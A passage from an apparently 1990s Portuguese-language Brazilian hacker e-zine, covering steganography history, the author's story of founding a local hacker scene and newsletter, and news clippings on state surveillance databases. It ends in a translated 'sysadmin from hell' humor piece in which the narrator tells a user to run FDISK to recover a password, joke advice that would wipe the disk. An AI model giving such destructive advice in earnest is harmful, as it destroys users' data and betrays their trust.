"micro-pontos". Isso antes de 1939. Durante a guerra, ha' noticia de na propria Alemanha (durante o periodo nazista), a literatura denominada "subversiva" (livros considerados "decadentes" por serem de autores judeus ou contra o regime nazista) eram reduzidos fotograficamente e contrabandeados em saquinhos de fermento. Dentro dessa briga entre censoresXespioes havia tambem toda uma grande gama de tintas "invisiveis" para quem le, mas que com os reagentes adequados, tornam-se visiveis para o destinatario da mensagem. Coisa De crianca, tipo usar uma pEna para escrever com sumo de limao ou outra fruta citrica e esquentaR delicadameNte o papel dEpois, para ver a mensagem aparecer. A coisa chegaVa ao ponto de se inserir mensagens dentro de uma folha de papel, a semelhAnca daquela tirinha que existe para diferenciar notas faLsas de verdadeiras. E' um assunto bem vasto. Ha' inumeras formas de se esconder texto dentro de texto. O unico problema e' que se precisa de um volume enorme de caracteres p. que um pequeno volume passe despercebido. Por exemplo, no paragrafo anterior, ta' o meu nome escondido, basta procurar pelas maiusculas que estao fora de lugar, logo depois da palavra "mensagem". O hit atual da esteganografia e' a ocultacao de mensagens em fotos. Pra usar um palavriado mais tecnico: uma foto e' um arquivo binario, com uma quantidade enorme de bits, donde a alteracao de um pequeno numero nao aparece. Uma imagem comum de 8 bits, 256 cores, usa 8 bits para representar um pixel ou elemento de gravura digitalizada, sendo que ha' imagens de 32 bits que permitem milhares ou milhoes de cores. Uma imagem digital de 8 bits 480 por 100 em teoria pode ter 5000 caracteres de texto dentro e pode ser criptografada com pgp pra ficar mais segura ainda, embora metodos de "procura" ja' tenham sido desenvolvidos para achar estas mensagens escondidas (dados "sugados" de um URL esquecido). Existem varios softwares na rede que possibilitam esconder arquivos em imagens .GIF, .JPG e .BMP . Nenhum dos quais ideais para este tipo de uso, mas de qualquer forma, podem quebrar um galho. Apesar de que a imagem fica alterada e em alguns casos, distingue-se o lance. Aumenta o arquivo horrores. O mesmo pode ser feito com transmissoes de video e de audio que agora sao o hit de paginas na Web. Um exemplo para fotos gif pode ser encontrado na pagina de Romana Machado, autora (ate' gostosa, por sinal) do Stego for Mac, um programa feito para Mac porem disponivel para Java, que permite inserir texto em gifs, no http://www.fqa.com/romana . Embora este tipo de mensagem tenha sua utilidade, e' um segredo como qualquer outro. Uma vez suspeitado, pode ser ate' mais perigoso, ja' que o excesso de confianca pode facilitar a "escuta" de mensagens, no que e' chamado pelos alemaes de "funkspiel". A esteganographia ou ocultacao de mensagem so' e' realmente util quando nao se suspeita dela. HISTORIA RESUMIDA DO BARATA ELETRICA ou COMO COMECAR UMA CENA HACKER ============================ Artigo publicado na edicao Summer96 da revista 2600 - Hacker Quaterly Minha Autoria - minha traducao - tudo isso abaixo e' material que ja' comentei em numeros anteriores, mas este e' o texto integral, que saiu numa publicacao estrangeira, que e' referencia pro Computer Underground do mundo inteiro, alem de me render uma conta internet, a curupira@2600.com. Alem disso, acho que os caras gostaram tanto que o Barata Eletrica tambem esta' disponivel la' no ftp.2600.com. O que esta' entre parenteses, obvio, nao saiu no texto original, mas acrescentei por uma questao de "pingos nos iis" Tudo comecou em Outubro de 94. Havia o "Hackers and Virus Writers Congress" na Argentina, e foi o primeiro encontro do seu tipo na America do Sul. Minha experiencia com a internet e minha sede por conhecimentos relacionados a virsu me levou ate' la'. Eu tinha cerca de oito anos de manuseio de computadores e muito pouca sabedoria das coisas acontecendo em outros lugares. Qual a surpresa de encontrar uma cena hacker la'. No Brazil, do qual falei num artigo anterior, os grupos que faziam esse tipo de coisa nunca divulgavam seus conhecimentos. Os hackers argentinos tinham sua propria revista "Virus Report" e cerca de quatro ou cinco e-zines, todos eles lidando com a escrita de virus e alguns outros assuntos. Eles tambem tinham encontros 2600 (tipo de encontro de hackers toda primeira sexta-feira de cada mes). Quando voltei para Sao Paulo, ainda maravilhado pelo que vi no Congresso, eu disse a meus amigos no trabalho a respeito e alguns deles, gente ate'importante, pensaram que formar um congresso de hackers aqui poderia ser uma boa coisa, se pudesse ser um encontro positivo. Minha turma nao tava mais por ai'. O lugar onde costumavamos nos encontrar, o laboratorio de Computacao da Escola Politecnica, foi substituido e os rapazes arrumaram bons empregos e foram substituidos por novos frequentadores, nenhum dos quais me conhecia. Eu tentei fazer contato e descobri que, sim, eles tinham um tipo de organizacao propria, tambem tinham acesso internet, mas nao, nao tinham nem o tempo nem a vontade de explorar tudo. O especialista em virus com quem conversei sabia varios truques, mas nao tinha o conhecimento da situacao la' fora, nem os arquivos sobre a fabrica de virus Bulgara ou o AIDS trojan. Nada. Eles tinham bastante experiencia pratica. Cada um tinha algo no qual resolveram trabalhar, mas nao muito a fundo. Muitos poucos no meu pais podem ler ingles o bastante para ler todos os e-zines como o PHRACK. A pior coisa e' que eu fiz o meu "contato" assim meio do nada, sem muito o que mostrar nem pedindo por conhecimento. Um ano surfando na rede (via linha dedicada) foi muito ruim pra mim, em termos de sociabilidade. Os caras so' confiaram em mim mais ou menos. Nada alem disso. Nao copiariam os discos com informacaoes que preparei para elesnem iriam partilhar seus conhecimentos comigo - so' uns bytes aqui e ali (alias, ate' hoje isso nao mudou - nota). Fizeram ate' um talker, o primeiro do Brasil (carpa.ciagri.usp.br - hoje sei la' o que ta' rolando - ainda to^ meio p(*) c/ um dos caras q. montou o lance:"enrolou" que ia escrever sobre o assunto e e' por isso que o nome dele nao aparece - maldade), que poderia ter sido uma janela p. fazer mais contato, mas decidi por uma outra forma de contato. Eu pensei que seria necessario "educar" os novos integrantes, de forma que eles pelo menos partilhariam alguma coisa de etica e de mentalidade hacker. Muitos nao nao compreendem a importancia de tracar uma linha entre o que e' certo e o que e' errado. A imprensa nao publicaria artigos mostrando meus pontos de vista sobre o assunto porque (naquela epoca) muito pouca gente sabia sobre aquilo. E a preparacao para tal congresso demandaria muita cobertura da imprensa. Eu comecei fazendo uma lista de correspondencia manual. As pessoas me mandariam cartas pedindo para entrar na lista e entrariam para um "alias" (ou lista) e eu enviaria um ou dois arquivos por dia. Apenas dicas sobre como encontrar isso ou aquilo e um arquivo ou outro sobre acontecimentos envolvendo hacking. Ate'comecei a por um anuncio no newsgroup soc.culture.brazil. Mais tarde, fiquei sabendo da esquina-das-listas e montei a lista "hackers" la'. E por volta da mesma epoca convidei a "rataiada" para comecar um encontro. Planejei igualmente um pequeno informativo para passar as dicas, de forma a nao ter que repetir coisas como: "Porque estou fazendo isso", "O que e' hacking", etc . O nome era importante (hoje ja' nao acho tanto). O unico que "pegou" foi Barata Eletrica. Meu chefe, entre todos, foi o unico que pegou de cara o significado. Me perguntou: "Porque nao algo que fosse acima da terra?". Fiz 100 % sozinho.(Pedi a colaboracao da mocada, que repetiu o que repete ate' hoje: "To com prova, tenho trabalho pra entregar, esta semana ta' cheia, nao sei fazer") O primeiro numero foi sobre algumas coisas que achava que deveriam ser de conhecimento comum como definicao de hacking, qual era o meu objetivo, como e porque estava fazendo isso, etc.. Um fa~ da revista Phrack nao leria isso, com certeza. Foi provavelmente o primeiro fanzine em lingua portuguesa publicado na Internet. Naqueles dias, os jornais falavam sobre a rede, mas nao era ainda coisa disponivel fora das universidades (pra se ter uma ideia, modem de 2400 era o comum). A pessoa tinha que estar envolvida com um projeto de pesquisa para conseguir o acesso ou aceitar um email comercial via UUCP. Compuserve era qualquer coisa quase desconhecida (hoje ouvi falar que ja' existe - do meu ponto de vista, infelizmente). As pessoas tinham que me mandar email para receber o fanzine. O primeiro foi completado em cima da hora porcausa do "provavel" encontro ao qual poucos, bem poucos compareceram. Me deixou meio desapontado. Mas o pior aconteceu um tempo depois. Ninguem da Administracao tinha se incomodado com a minha lista informal, nem com a lista "hackers" ou mesmo o fanzine em si. Mas ai' eu dei a dica para um jornal (Folha de Sao Paulo, Coluna NETVOX, a segunda ou terceira vez que tal coluna apareceu, se nao me engano). As pessoas ouviram falar da minha lista depois disso. Destino ou nao, tava usando a camiseta da revista 2600 - Hacker Quaterly nas duas ocasioes - no dia em que a dica apareceu no jornal e no dia em que a administracao me chamou (de uma forma simples, suspendendo minha conta) para perguntar sobre a minha lista. Nao que nao me conhecessem. Eu ERA um dos caras com o maior numero de horas usando a rede na Universidade de Sao Paulo (simples: o laboratorio de computacao ficava aberto a noite inteira, acesso via linha dedicada, era muito comum eu entrar meio-dia e sair as 7:00.. da manha do dia seguinte). Muito bom o fato de que nao podiam me acusar de tentar advinhar a senha de root. As pesssoas eram paranoicas naquela epoca. Mas apesar de estar usando uma camiseta da 2600 com uma blue box estampada, (sim, tambem acharam muito ironico), apenas me disseram para nao usar os computadores da Universidade como veiculo de transmissao. Nunca mais. Foi duro. Mas mais tarde, isso acabou virando a melhor coisa que poderiam ter me pedido. (Eu estava com preguica) Isso me forcou a procurar por um site ftp (naquele tempo nao havia essa de geocities, internet comercial era novidade ate' nos EUA, voce tinha que pedir para que algum lugar aceitasse colocar seu material disponivel para ftp ou gopher, acho que o comum era achar netscape na versao 0.98, so' pra referencia). De todos os lugares, tentei pedir para a EFF - Electronic Frontier Foundation. O mesmo lugar de onde eu tinha feito download de tudo quanto e'coisa, horas a fio. Para minha surpresa, aceitaram. Me salvou muitas horas, mandando o Barata Eletrica por email para uma conta internet Freenet (saudade das BBS internet..) e depois mandando via email para 80 pessoas no Brasil (a conta ficava na Alemanha, as vezes demorava dez segundos para as letras aparecerem na tela). Sempre havia gente nova ouvindo sobre meu fanzine. Eu ate' fiz um programa que fazia a mala-direta de forma automatica. Mas mesmo assim, eram quatro ou cinco horas de trabalho para mandar um novo numero do fanzine para todo mundo que pedia. Mais tarde a Universidade Federal de Santa Catarina concordou em colocar o zine no seu URL (onde esta ate' hoje). Pena que nao era em html. E outra universidade (ftp.ufba.br - valeu sluiz) pos no seu site ftp. Os participantes da lista "hackers" fora da minha Universidade cresceram ate' o numero de 200 e mais importante, um cara me pediu para ajudar num artigo sobre hackers para a revista SUPER INTERESSANTE (Materia do Heitor e do Ricardo). Havia ate' mesmo uma foto minha e o URL do meu fanzine. A boa coisa e' que o reporter realmente entendeu meu ponto de vista e o artigo nao colocou os hackers como um tipo de inimigo publico. A midia, a maior parte do tempo, nao se preocupa em aprender sobre um assunto qualquer. Eles constroem em cima de algo que alguem escreveu sobre isso anteriormente. Uma boa coisa sobre o meu e-zine e'que ele continha dados que ajudaram alguns reporteres a escreverem sobre esse assunto. Quando um cara foi pego na Universidade de Pernambuco, a revista VEJA nao chamou ele de hacker, mas de pirata do computador. Em outros dois break- ins, a mesma coisa aconteceu. Os caras ate' colocaram uma diferenca entre "hacker" e "dark-side-hacker", a mesma diferenca estressada no meu fanzine. Me disseram que por causa do meu fanzine, seria sempre banido de conseguir acesso de super-usuario (como acontece normalmente, o cara resolve te aproveitar) legalmente, mesmo no meu lugar de trabalho. Os caras na administracao estavam paranoicos a meu respeito. Nao interessava se meu zine estava sendo imitado por outros caras em outras universidades, alguns ate' pedindo ajuda. Hoje (e'poca em que escrevi isso, inicio de 96) ha' outro cara tambem fazendo um hacker zine, muito mais agressivo do que o meu (era o hack.br). A lista "hackers" alcancou 600 pessoas (na epoca em que escrevi era a terceira em numero e se nao fosse um defeito que fazia o software da lista apagar aleatoriamente inscritos, seria talvez a primeira). As pessoas estao apenas comecando a aprender sobre o assunto. Quase toda semana, alguem me pede para ensinar como usar o SATAN ou algum tipo de software de cracking. Outros me pedem algo mais complicado, como ser seu guru ou mestre. A maioria dos que pedem estao entre os 14 e 19 anos de idade. Uma vez que meus artigos falam de como e' dificil fazer isso sozinho, as pessoas oferecem ajuda e o fanzine esta sendo distribuido em tudo quanto e' lugar. Mesmo a BBS do lugar onde eu trabalho me pediu permissao para colocar la' (coisa que a Administracao tinha me pedido pra nao fazer). Este sucesso e' algo que ainda nao entendi direito. Para escrever os artigos, tive que deixar de hackear, tanto por falta de tempo como por seguranca. Os artigos, por sinal, sempre bem simples, para evitar qualquer tipo de problemas legais. Eu fiz a besteira de usar o meu proprio nome, ao inves de um apelido. Tentei outra vez organizar o pessoal num boteco e (pra evitar excesso de lammers) ia informar a tchurma do local e hora pela internet. A Administracao tava de olho e resolveu "suspender" minha conta exatamente ha' dois dias desse novo encontro e a coisa melou. Nao aconteceu porque nao pude enviar os detalhes. A ultima coisa que aconteceu (na epoca q escrevi isso) foi a traducao do livro "Hacker Crackdown" do Bruce Sterling. Tava juntando gente via email, para traduzir parte por parte o livro. Cada um iria traduzir cinco ou dez paginas para o portugues. Um dia, minha conta foi craqueada e reclamei pros caras da administracao. Para mim, so' podia ser o trabalho de alguem com status de Super-Usuario ou administrador. Eles foram checar os arquivos na minha conta. Meu nome ja' estava na lista negra, desnecessario dizer. Quando o cara que checou a coisa encontrou o arquivo de nome "crac.gz", ele nao se incomodou em checar o que tinha dentro. Ao inves, a conta foi bloqueada. E mais tarde, uma mulher (loira tingida) veio me avisar que o unico jeito de conseguir que minha conta "voltasse" seria abrir, entre testemunhas, aquele arquivo especifico (lembro ate' hoje as palavras: "o sistema deve ser protegido" - mais tarde a coisa mudou um pouco). Eles pediram para mim escrever num papel "la raison d'etre" do arquivo. Assinado, ponto. Um cara da alta administracao iria checar e me devolver o uso da conta. Um dia desses, talvez num mes (na verdade, levou tres meses e alguns dias, tinha dez megabytes de email e um especifico falando que minha caixa de email estava lotada e eu ia perder tudo se nao limpasse). Eu ganhei uma verdadeira turma de admiradores de hackers de todo o Brasil (talvez ate' alguns peritos de verdade) e (quase) perdi meu acesso internet (do qual dependia e depende meu trabalho ate' hoje). E' algo a se falar. Aviso aos navegantes, entao: Se voce esta' pensando a respeito de armar uma cena hacker no seu pais (a revista 2600 e' ponto de referencia em tudo quanto e' canto do mundo), nao faca isso sozinho. Informe-se sobre a legislacao (no caso do Brasil, vai cair uma pesadissima, me falaram). Sempre ajuda. Use quaisquer listas disponiveis e facam-nas funcionarem para voces. Planeje uma linha de acao. E' um processo que nao pode ser apressado. Armazenae o email que voce receber, mas criptografe tudo. Use a imprensa comum, quando disponivel. Tente fazer amigos entre os reporteres (coisa as vezes dificil). Use talkers, IRC e ate' mesmo telefone para fazer contatos. Eu usei apenas correio eletronico e um fanzine hacker. Nao e' o bastante. Se voce tiver problemas, divulgue. Isso nao vai piorar a coisa. Tente escrever bons artigos (pelo menos algo que consiga reler). Se usar fontes estrangeiras, tenha certeza de que entendeu o que leu. Nao pense que pode fazer dinheiro com isso so' porque ficou famoso (isso e' talvez a maior ilusao). Tente (porem) manter seu emprego, sua formatura (graduacao ou pos) e seus amigos. Ira' (com certeza) precisar deles alguma vez no futuro. Se sua conta for "congelada", nao chore. Tenha outra pra substituir. E acima de tudo, nao perca a esperanca. A coisa e' distribuir a semente. O resto e' uma questao de tempo. ADENDO: Atualmente, ja' consegui um trabalho ajudando a montar um servidor internet (anonimamente). Tem um encontro 2600 rolando em Belo Horizonte, perto de um lugar chamado Pelego's Bar (nao perguntem que nao sei onde fica). Tinha um no RJ, mas saiu fora da lista do 2600 - Hacker Quaterly. O local onde eu ia tentar de novo montar a reuniao de hackers mensal foi posto a venda recentemente. O congresso internacional de hackers ainda e' projeto. E' muito dificil tirar os caras do computador aqui em Sao Paulo. Tudo e' muito longe. O cara fala que vai e nao aparece nem fala que nao vai aparecer. Varios clubes de hackers estao rolando pela rede. Lotados, ja'. Existe a lista fussadores, mas tambem dificil de entrar e lotadassa. Os maiores problemas sao excesso de gente querendo se enturmar para aprender besteira (so' o minimo necessario para se chamar de hacker) ou falta de tempo da mocada mais capacitada. Parece que vai rolar uns encontros por ai' de mocadas de BBSes underground, mas nao estou por dentro. Como nao acesso nada fora da Internet, so' se alguem me fornecer informacao vou me inteirar disso, o que nao quer dizer que o Brasil inteiro, atraves do BE va' ficar sabendo. Ta' assustando a quantidade de gente que quer se enturmar so' pra falar que e' hacker. So' pra falar que e'. Como se fosse necessario... Parece que tao rolando uns zines novos por ai'. Mas como sao de caracteriscas proprias e nao pediram nenhuma especie de divulgacao, fazer o que? O Barata Eletrica ta' tao difundido, tao praga em tudo quanto e' BBS da vida, que nao pode ser realmente chamado de uma publicacao underground, no sentido da palavra. Existem BBSes (nao internet) como a Medusa e outras, que sao responsaveis por nucleos nacionais de distribuicao de fanzines de virus (um tipo de publicacao que ta' ficando mais popular e que tambem ate' engloba hacking). Mas divulgar significa lotar ainda mais umas poucas linhas telefonicas que o BBS nem sempre tem.(E tambem, dependendo do caso, submeter o dono da linha telefonica a algum tipo de perseguicao. Nao pensem que isso dai' nao acontece nem que nao esta' sendo vigiado, porque esta'). E tem o lance de propaganda gratuita que nao e' legal fazer se o produto nao for tambem gratuito. Em alguns casos, se a BBS estivesse afim de aparecer, ela propria faria uma publicacao. Alguns fanzines como o NUKE, ou a PHRACK comecaram como uma forma de difundir a BBS underground do grupo. Um detalhe e' que no caso da PHRACK a informacao que a revista continha varias vezes era falsa ou incompleta. Isso e' comum pacas. O cara e' que tinha que se virar para completar a parte que faltava. E as informacoes realmente interessantes, se desatualizam rapidamente. Dai' a utilidade de listas como a lista "hackers". Nada impede que novos clubes de hackers sejam criados para intercambio de informacao. So' alguns por enquanto descobriram essa ideia, de criar suas proprias "panelinhas". Quando houver clubes suficientes, talvez as pessoas comecem a se reunir em locais, da mesma forma que se reunem em chats da UOL e IRC, que pelo que ouvi falar e' o que mais acontece. A traducao do livro Hacker Crackdown ainda vai rolar, assim como vai rolar o meu projeto de uma conferencia aqui no Brasil. Os convidados estrangeiros, isso ta' quase certo. Os brasileiros ainda sao uma duvida. O meu chefe ainda tem interesse no assunto, faltam apenas rolar varios detalhes. Meu maior medo e' montar isso sem ter certeza de publico, como rolou nos encontros. Quem tiver interesse, fique ligado na lista hackers. O dia que rolar, vai aparecer a noticia la'. PARA A SUA PROTECAO: GRANDE IRMAO ESTA' VINDO.. =============================================== New Number 2- "INFORMATION, WE WANT INFORMATION" The Prisoner- "WHO ARE YOU?" NN2 - "THE NEW NUMBER 2" TP - "WHO'S NUMBER ONE?" NN2 - "YOU ARE NUMBER SIX" TP - "I AM NOT A NUMBER, I AM A FREE MAN!!!" NN2 - "HA! HA! HA!" O trecho acima foi tirado do seriado "O Prisioneiro" e inserido numa cancao do grupo de heavy metal "IRON MAIDEN". E' tao antigo esse seriado que nem assisti (do tempo em que o Jo Soares era magro). O que eu soube seriado, o sujeito era sempre preso e interrogado por nao se sabe quem nem sobre o que (os caras nao queriam dar qualquer tipo de informacao, so' receber). Um pouco pior do que "O Processo" de Kafka. Mas como se viu em Diadema, no nosso pais, a ficcao ta' muito aquem da realidade. O cara la' foi morto so' porque apareceu no lugar errado, na hora errada. Isso nao acontece so' aqui, obvio. Mas nao e' consolo. Algumas noticias tiradas dos jornais ESTADO DE SAO PAULO e ZERO HORA. Acho que todo mundo devia prestar mais atencao no jornal. Infelizmente por falta de grana, tive que cancelar a assinatura. Mas durante o periodo em que fui leitor regular, peguei algumas perolas que lembram um pouco aquele livro do George Orwell, "1984". Num pais que ja' teve 8(?) Constituicoes, sei la' quantas ditaduras e casos como os de Diadema (o tipo de coisa que ja' ouvi muito antes e ate' da boca de turista argentino), as pessoas deixam passar noticias tao importantes e pior: nao fazem nada, nao sabem de nada. Perder os sentidos num hospital qualquer hoje pode ser o inicio de uma doacao de orgaos, por exemplo. Talvez sob pretexto de combater o trafico de drogas e outros crimes, baixem uma lei obrigando a tatuacao de um numero de registro no braco. Who knows? Ia colocar, mas perdi recorte de uma reportagem comentando que algumas escolas do primeiro e segundo graus estavam testando um cartao eletronico que possibilitava aos pais saberem o que seus filhos estavam comendo no intervalo das aulas. Ja' nao basta que a crianca que entrar na escola receba um numero de RG. Cada gasto dos alunos (que estariam usando o tal cartao) ficava registrado no chip e depois essa informacao podia ser debitada na conta do pai ou coisa do genero. Em outras palavras, o garoto pede um refrigerante, chega em casa, o pai da' aquela bronca porque acha um absurdo gastar dinheiro com porcarias. E', de menino que se torce o pepino. Quando adulto, esse menino nao vai ficar surpreso se toda sua conta bancaria for monitorada pela empresa, que quer saber se ele ta' gastando grana com coisas saudaveis ou de repente ta' planejando algo, tipo um desfalque, p. pagar as dividas.. deve ficar mais facil negar um aumento quando se sabe que o funcionario ta' bem de vida. As pessoas podem ate' me achar paranoico, viajando na maionese. Mas na Inglaterra, uma lei que permitia ao cidadao saber o que o governo sabia sobre ele foi alterada. O cara so' recebe isso meses depois. As empresas, ao contratar gente, "pediam" aos candidatos a determinado emprego, que "fornecessem" tal papel, alem do Curriculum Vitae. Na pratica, seria o Servico Secreto checando se o cara era tudo aquilo que dizia. Com um adendo: um sujeito do Servico Secreto e' um funcionario publico tentando achar uma "conspiracao" pra provar que merece sair do servico de rua. Donde se pode imaginar qe coisas do tipo "namorada do PT" poderia virar "ligacoes com a esquerda". Como o pessoal na Inglaterra se revoltou, fizeram um periodo de espera de alguns meses entre o pedido do tal "dossier" e a entrega. Detalhe: la' eles parece que implantaram um sistema de informacao digital sobre cada cidadao, como pretexto p. combater o terrorismo. E' mais facil invadir a privacidade de todo mundo do que sair da Irlanda do Norte, parece. E ai' fica aquele bando de caras, que achavam que iam ser "James Bond", vigiando a amante do diretor, aquele filho do deputado ou mesmo um cara qualquer que se encaixa no perfil de ameaca ao trono ingles. Ai' acontece qualquer coisa e algum tempo depois um filme chamado "Em Nome do Pai", aparece e faz sucesso nas bilheterias. Se isso nao te assusta, imagina entao que e' praxe no Brasill organizar uma reforma qualquer e usar o modelo de um pais mais desenvolvido, leia-se inclusive a Inglaterra, como exemplo. Entao, PODE ACONTECER COM VOCE. REDE DE INFORMACOES INTEGRARA' POLICIAS DO PAIS (23-01-97 pg C11) Sao Paulo e Rio Grande do Sul testam desde ontem Infoseg, que permite localizar criminosos. Brasilia - Desde ontem, a policia esta' testando o Programa Nacional das Informacoes de Justica e Seguranca Publica (Infoseg), instalado pelo Ministerio da Justica para localizar, com mais rapidez, criminosos em todo o Pais. Interligado a uma central na Policia Federal, o projeto tambem esta' funcionando no Rio Grande do Sul. O acesso aos dados usa o mesmo sistema da Internet, com um circuito privado que sera' instalado nos Estados. A policia paulista tera' disponivel informacoes de 4,6 milhoes de pessoas cadastradas pelas Secretarias de Seguranca Publica de todo o Pais. (Nota do Barata Eletrica: Essas secretarias sao os orgaos responsaveis pela emissao do RG de cada cidadao) "Se uma pessoa e' presa no Acre, por exemplo, todas as suas informacoes serao repassadas para o banco de dados da policia paulista e da Policia Federal", explica o diretor do departamento de Acoes de Seguranca Publica, general Dyonelio Morosini. O sistema ainda sera' adotado no Poder Judiciario e penitenciarias. A policia paulista tambem contara' com dados sobre carros roubados, pessoas desaparecidas, armas de fogo, fotos e impressoes digitais, crimes, inqueritos e mandados de prisao.(EDSON LUIZ) TRECHOS DO PRONUNCIAMENTO NO PROGRAMA DE RADIO "PALAVRA DO PRESIDENTE" (28-1-97 - copiado do Jornal ESTADO DE SP - pg C6) "A nossa meta para 97 e' reunir informacoes criminais, para colocar a disposicao das autoridades que cuidam da seguranca. Nos acabamos de lancar o projeto piloto do Programa de Integracao Nacional das Informacoes de Justica e Seguranca Publica, o Infoseg. Este programa reune, em um so' banco de dados, todas as informacoes criminais das Policias Federal, Civil e Militar, do Ministerio Publico, do Judiciario e do Sistema Penitenciario de cada Estado. Isso significa que, se um delegado prender uma pessoa no interior de um determinado Estado pode buscar informacoes sobre ela e saber se ja' cometeu algum crime em outro Estado, se e' procurada pela policia, se responde a algum processo. Um juiz, ao examinar os processos, tambem podera' entrar no sistema e conseguir a ficha completa do criminoso. Os procuradores que pretenderem apresentar denuncia, tambem conhecerao todas as acusacoes que pesam sobre aquele cidadao em qualquer parte do Pais. Em resumo, a integracao vai facilitar o trabalho da policia e da Justica na perseguicao aos criminosos que mudam de Estado a toda hora. Nesta primeira fase, o Infoseg vai integrar 4,6 milhoes de informacoes da Policia Federal do Rio Grande do Sul e de Sao Paulo. [..] Ja' repassamos recursos para 25 Estados iniciarem a adocao do projeto. Queremos entregar todas as unidades da federacao ate' o fim do ano que vem. [...] Outro instrumento que vai facilitar e dar mais seguranca e' o Registro Civil Unico. O projeto de autoria do senador Pedro Simon preve que cada brasileiro tera' apenas um numero, ao inves de 21 como e' hoje, para identidade, titulo de eleitor, etc.. A diversidade de numeros tem facilitado a acao de criminosos, como e' o caso dos portadores de identidades falsas. O projeto foi aprovado no Senado e espero que em breve a Camara o aprove tambem, para que eu possa sancionar essa lei que sera' mais um instrumento a favor de nossa seguranca." --------------------- BRASILEIROS TERAO 5 ANOS PARA OBTER REGISTRO UNICO (9/4/97) Os atuais documentos, como carteira de identidade, vao perder a validade apos esse prazo BRASILIA - Os brasileiros terao cinco anos para se recadrastar e obter o registro civil unico. A partir dai' os atuais documentos, como a carteira de identidade, perdem a validade. Ja' o governo federal tera' seis meses para apresentar as normas para a criacao do registro unico e mais um ano para montar a maquina que o substitua. A Lei 9.454, que criou o novo documento, foi sancionada anteontem, com vetos, pelo presidente Fernando Henrique Cardoso. Fernando Henrique vetou o paragrafo unico e os tres incisos do projeto aprovado pelo Congresso, que tracavam regras para a composicao do numero. -------------------------- RECEITA QUER LEI PARA INTERCAMBIO DE SIGILO (28/3/97) pg a6 BRASILIA - O secretario da Receita Federal, Everardo Maciel informou ontem que ja' esta' trabalhando em um projeto de lei complementar para permitir a troca de informacoes protegidas por sigilo bancario e fiscal entre Receita Federal, Banco Central e outras entidades de fiscalizacao do governo. Hoje, a Receita tem acesso apenas ao sigilo fiscal e o Banco Central, ao sigilo bancario. A troca de informacoes so' e' possivel em condicoes excepcionais, como quando uma CPI aprova a quebra de sigilo de pessoas sob investigacao. ---------------------- CRIANCAS TERAO CARTAO MAGNETICO Estudantes poderao pagar cantina, alem de registrar frequencia as aulas e notas, entre outras informacoes (11-03-97 Estado de Sao Paulo - secao de economia) [..] esta' lancando um cartao dotado de chip (componente eletronico) capaz de armazenar ate' 8 mil caracteres. As criancas poderao comprar o lanche na cantina e debitar o valor no cartao, conforme um limite estabelecido pelo pai. Apesar de aparentemente ser uma delicia para as criancas, o cartao ainda servira' como uma especie de bedel eletronico, pois podera' registrar tambem varias outras informacoes, como frequencia as aulas e as notas dos alunos. Os pais poderao ter relatorios detalhados dos gastos e do aproveitamento escolar dos filhos. ---------------------- POLICIA INVESTIGA VENDA DE DROGAS PELA INTERNET - 7/03/97 pg C7 Possiveis traficantes e compradores discutem qualidade e preco de entorpecentes em conversas "on-line", em que a identificacao das pessoas e' muito dificil de ser checada (Silvia Barsetti) A policia fluminense investiga denuncias de que traficantes do Rio estariam usando a Internet, a maior rede de comunicacao do mundo, para a venda de drogas. [..] Os indicios estao sendo levantados por meio de consultas on-line no chat - sistema que permite bate-papo em tempo real e no qual a identificacao e' muito dificil de ser checada. ---------------------- ZERO HORA - 25/10/96 - caderno de informatica COMPUTADORES SOB SUSPEITA - Policiais se especializam na investigacao de operacoes eletronicas A Policia Federal esta' organizando um grupo para invadir computadores e descobrir detalhes de operacoes suspeitas. O Grupo Especial de Busca e Analise de Computadores (Gebac) e' formado por experts em informatica. Sem previsao para comecar a operar, o Gebac esta' sendo treinado por especialistas na Australia, Canada' e Estados Unidos. Enquanto nao ha' solucao local para casos de escuta eletronica, a Policia Federal se vale de um acordo de cooperacao com autoridades estrangeiras. Antonio Augusto Araujo, diretor do Instituto Nacional de Criminalistica, diz que quando for necessario sera' solicitada a ajuda da policia dos Estados Unidos, o Federal Bureau de Investigacao (FBI) ou do servico de inteligencia daquele pais, a Central Intelligence Agency (CIA). No Brasil, a quebra do sigilo eletronico esta' regulamentada pela Lei 9.296 de 24 de julho de 1996. Criada para os casos de escuta telefonica, tambem se aplica a interceptacao de fluxo de comunicacao em sistemas de informatica e telematica. A pena prevista e' de dois a quatro anos de prisao e multa. Desde a sua regulamentacao, nao se tem registro de que a lei tenha sido aplicada a hackers. [..] Enquanto o Gebac nao entra em campo, a PF conta com acordos e parcerias com os policiais dos Estados para vasculhar os computadores de pessoas ou operacoes suspeitas. A Secretaria da Justica e Seguranca Publica do Rio Grande do Sul ja' esta' preparada para a utilizacao desta tecnologia em operacoes policiais.[..]"Normalmente recorremos a UFRGS quando existe a necessidade de obter dados mais precisos", afirma a diretora de Divisao de Pericias da Capital, Maria Cristina Farias. ---------------------- UMA SEMANA NA VIDA DO ADMINISTRADOR DE SUPORTE DO INFERNO ========================================================= (Traduzido do original por Fabricio A. M. de um texto americano meio famoso. Qualquer semelhanca e' mera coincidencia. O texto e' humor, pra quem nao pegou o espirito da coisa. Nao e' pra sair imitando) Segunda 8:05am Usuario chama dizendo que perdeu a password. Eu disse a ele para usar um utilitario de recuperacao de senhas chamado FDISK. Ignorante, ele me agradecu e desligou. Meu Deus! E a gente ainda deixa essas pessoas votarem e dirigirem? 8:12am A Contabilidade chamou para dizer que nao conseguiam acessar a base de dados de relatorios de despesas. Eu dei a resposta Padrao dos Administradores de Sistema #112: "Engracado... Comigo funcionou...". Deixei eles pastarem um pouco enquanto eu desconectava minha cafeteira do No-Break e conectava o servidor deles de volta. Sugeri que eles tentassem novamente. Ah... Mais um usuario feliz... 8:14 am O Usuario das 8:05 chamou dizendo que recebeu a mensagem: Erro no acesso ao drive 0. Disse a eles que isso era problema de SO e: transferi a ligacao para o microsuporte. 11:00 am Relativamente calmas, as ultimas horas. Decidi reconectar o telefone do suporte para ligar pra minha namorada. Ela disse que os pais dela virao pra cidade nesse fim-de-semana. Pus ela "em-espera" e transferi a ligacao para o almoxarifado. Que e' que ela esta' pensando? Os torneios de "Doom" e "Myst" sao neste fim-de-semana! 12:00 pm almoco. 15:30 pm Retorno do almoco. 15:55 pm Acordei da soneca. Sonhos ruins me dao tremores. Empurrei os servidores sem razao. Voltei pra soneca. 16:23 pm Outro usuario liga. Quer saber como mudar fontes em um formulario. Perguntei que chip eles estao usando. Falei pra eles ligarem novamente quando descobrirem. 16:55 pm Resolvi rodar a macro "Criar Salvar/Replicacao de Conflitos" para que o proximo turno tivesse algo a fazer... Terca 8:30 am Terminei a leitura do 